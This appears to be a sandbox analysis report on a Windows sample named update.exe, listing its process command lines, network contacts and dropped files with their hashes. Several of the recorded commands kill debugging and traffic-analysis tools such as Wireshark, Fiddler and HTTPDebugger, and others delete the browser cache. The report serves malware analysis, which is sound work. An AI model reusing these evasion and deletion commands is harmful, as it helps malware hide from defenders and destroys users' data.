"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff655505460,0x7ff655505470,0x7ff655505480

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6340 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6372 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\update.exe

"C:\Users\Admin\Downloads\update.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6440 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6472 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 444 -p 5584 -ip 5584

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5584 -s 752

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\Downloads\update.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\unnamed_logs.txt

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\un.ini

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2144,6333961043641048077,6280574351338833314,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1264 /prefetch:8

Network

Country Destination Domain Proto
US 93.184.220.29:80 tcp
US 8.8.8.8:53 keyauth.win udp
US 172.64.136.33:443 keyauth.win tcp
N/A 127.0.0.1:49829 tcp
N/A 127.0.0.1:49831 tcp
US 8.8.8.8:53 nav.smartscreen.microsoft.com udp
NL 20.73.130.64:443 nav.smartscreen.microsoft.com tcp
US 8.8.8.8:53 smartscreen-prod.microsoft.com udp
IE 20.82.250.189:443 smartscreen-prod.microsoft.com tcp
IE 20.82.250.189:443 smartscreen-prod.microsoft.com tcp
IE 20.82.250.189:443 smartscreen-prod.microsoft.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
NL 20.73.130.64:443 nav.smartscreen.microsoft.com tcp
US 204.79.197.200:443 www.bing.com tcp
NL 20.73.130.64:443 nav.smartscreen.microsoft.com tcp
US 8.8.8.8:53 nav.smartscreen.microsoft.com udp
IE 20.82.250.189:443 nav.smartscreen.microsoft.com tcp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google udp
US 13.107.21.200:443 www.bing.com tcp
US 204.79.197.239:443 tcp
NL 95.101.78.82:80 tcp
NL 95.101.78.82:80 tcp
N/A 224.0.0.251:5353 udp
NL 104.80.225.205:443 tcp
FR 51.11.192.48:443 tcp
US 8.8.4.4:443 dns.google udp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 tcp
NL 23.73.0.144:443 assets.msn.com tcp
NL 23.73.0.144:443 assets.msn.com tcp
NL 23.73.0.144:443 tcp
NL 65.9.86.26:443 tcp
FR 2.22.22.128:443 tcp
IE 20.234.93.27:443 tcp
US 204.79.197.200:443 www.bing.com tcp
US 204.79.197.239:443 tcp
NL 104.109.143.22:443 deff.nelreports.net tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 172.64.136.33:443 keyauth.win tcp
US 172.64.136.33:443 keyauth.win tcp
N/A 127.0.0.1:50413 tcp
N/A 127.0.0.1:50415 tcp
N/A 127.0.0.1:50418 tcp
N/A 127.0.0.1:50420 tcp
N/A 127.0.0.1:50423 tcp
N/A 127.0.0.1:50425 tcp
US 172.64.136.33:443 keyauth.win tcp
US 204.79.197.239:443 tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
NL 104.109.143.5:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\HookLib.dll

MD5 9c236122ccef6d656ab48148c0aff1db
SHA1 e34489ce487a26a81feb394720e757b5275e6909
SHA256 ad9b423d81d1a1799809039445e6d3051224e49725ba1485a779fbcd56beeefb
SHA512 8ee11b7bf06e9860229005687bcfc20fd0836bb5e0f2796936a0086281a4a21a8b74740456700f2ea1ff3c9fd5d2b5a79c034805101aeb984bafaae72479f97c

\??\pipe\LOCAL\crashpad_2104_JGOLCTIAJJGBICJP

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\Downloads\update.exe

MD5 27e4dfcae59564bd73bdf7bc2f10e51e
SHA1 48aedbe1072bfc093d814c589e21c8696cf58a85
SHA256 43216e30e4f15418a8a9b037206a81a771944bcc93ca547fc7a52185dd121960
SHA512 24ac1071354637e8de0728cc1edd1927d69a19e10d3858289a063a2df73615b04d9a2214a7d5b8dd13f927cd3968c74101e08b1c9493eb71fddd8fc1a8e02ad9

C:\Users\Admin\Downloads\HookLib.dll

MD5 98f49c27634711f0af5e9535b13179f5
SHA1 4267af836b75278f22724a6864525efd60597781
SHA256 9afef3e87b1ab5973d002444f9c76edc2b4cee1e3441eaec539673c412b7fe16
SHA512 409fce493aa7bbe6bcc8d7e972fbe3e0da13fda86c6e14bdaf1c3b0e43ee0ab6c4c1ccd4efcb213681e3f54bd7658569647e08451aa5bd1daaba7f692ba427ad

C:\Users\Admin\Downloads\unnamed_logs.txt

MD5 05c4899eba745278b926db74dc76aa61
SHA1 cb9259fcaefad8ab82513ba37fb270e99f7f4c4b
SHA256 cc9e82a234856466b859ba9a8d2c59835ecb5bbb2aca740b74fea8a9778855f2
SHA512 c01c2687e48142de6bcbacf209c8804099679cc71ac19bd1d15c7ce0977f5438126658a6e9fa6143c36986bc7ea28dd91698a26f07b5d144bff8e337ed7a9cfe